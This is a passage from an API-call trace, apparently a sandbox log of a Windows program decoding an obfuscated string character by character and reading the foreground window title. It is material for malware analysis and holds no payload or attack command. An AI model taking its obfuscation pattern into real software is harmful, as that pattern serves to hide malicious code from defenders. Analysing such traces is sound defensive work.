lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.840] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.840] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.841] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.841] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.842] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.842] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.843] GetForegroundWindow () returned 0x20086 [0181.843] GetLastError () returned 0x0 [0181.843] SysStringLen (param_1=" ") returned 0xff [0181.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.843] SysStringLen (param_1=" ") returned 0xff [0181.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.843] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.843] GetLastError () returned 0x0 [0181.844] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.844] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.844] SysStringLen (param_1="Pr") returned 0x2 [0181.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0181.845] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0181.845] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.845] GetFocus () returned 0x0 [0181.845] lstrlenA (lpString="Pr") returned 2 [0181.845] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0181.845] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Pr") returned 2 [0181.845] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0181.846] GetFocus () returned 0x0 [0181.846] lstrcmpA (lpString1="Pr", lpString2="Pr") returned 0 [0181.846] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.846] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.846] GetFocus () returned 0x0 [0181.846] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0181.846] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0181.847] GetFocus () returned 0x0 [0181.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0181.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0181.847] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.847] VarBstrCmp (bstrLeft="Pr", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.848] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0181.848] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.849] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0181.851] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.852] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.852] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.853] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.853] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.853] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.854] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.854] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.855] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.855] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.855] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.856] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.856] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.857] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0181.857] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.858] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.858] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.859] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.859] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.860] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0181.860] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.861] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.861] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.862] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0181.862] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.863] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.863] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.863] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.864] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.864] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.865] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.913] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0181.913] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.913] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0181.914] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.914] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0181.915] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.916] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.916] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.917] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.917] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.918] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.919] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.920] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.920] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.921] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.921] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.922] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 